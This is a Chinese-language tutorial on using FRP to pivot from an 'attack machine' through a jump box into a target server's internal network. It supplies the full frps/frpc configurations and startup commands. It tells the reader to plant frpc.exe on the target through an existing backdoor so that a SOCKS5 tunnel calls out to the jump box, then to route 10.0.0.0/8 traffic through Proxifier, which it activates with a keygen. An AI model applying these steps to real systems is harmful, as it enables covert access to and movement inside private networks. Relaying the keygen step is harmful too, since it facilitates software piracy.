如何搭建FRP内网穿透环境:详细步骤指南
如何搭建FRP内网穿透环境:详细步骤指南
环境介绍
在本指南中,我们将使用三台设备进行FRP内网穿透的搭建,包括:本地攻击机、远程跳板机和远程目标服务器。首先,请根据目标服务器的操作系统环境下载相应版本的FRP(推荐为0.46.0版本)。
请确保下载安装Proxifier,并使用工具 python Proxifier_Keygen.py -v setup
进行激活。
配置跳板机
在跳板机上(使用Linux系统),下载并上传FRP的Linux版本0.46.0。接下来,配置frps.ini
文件,内容如下:
[common]
bind_port = 50001
privilege_token = pentest999
tls_only = true
要启动FRP服务并监听请求,请使用以下命令:
nohup ./frps -c frps.ini >/dev/null 2>&1 &
如果需要关闭服务,可以使用以下命令:
ps -aux|grep frp| grep -v grep
kill -9 PID
配置目标服务器
将Windows版本0.46.0的frpc.exe
通过后门上传至目标服务器,并创建配置文件frpc.ini
,格式如下:
[common]
server_addr = 跳板机ip
server_port = 50001
protocol = tcp
tls_enable = true
privilege_token = pentest999
[plugin_socks5]
type = tcp
remote_port = 8123
plugin = socks5
use_encryption = true
use_compression = true
plugin_user = ptest666
plugin_passwd = ptest666
运行FRP以连接跳板机:
frpc.exe -c frpc.ini
配置Proxifier
在Proxifier中,添加新的Proxy Server,设置如下:
- 服务器地址:跳板机的IP
- 端口:在
frpc.ini
中设置的8123 - 用户名和密码:与
frpc.ini
中的设置相同,均为ptest666
在Proxification Rules中,添加一条规则,将任意应用程序的目的地址为10.0.0.0/8的流量指向我们之前设置的跳板机ip:8123
。
测试连通性
在目标服务器内网中,存在一个Spring Boot项目。现在,您可以直接在本地浏览器中输入内网IP进行访问。
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果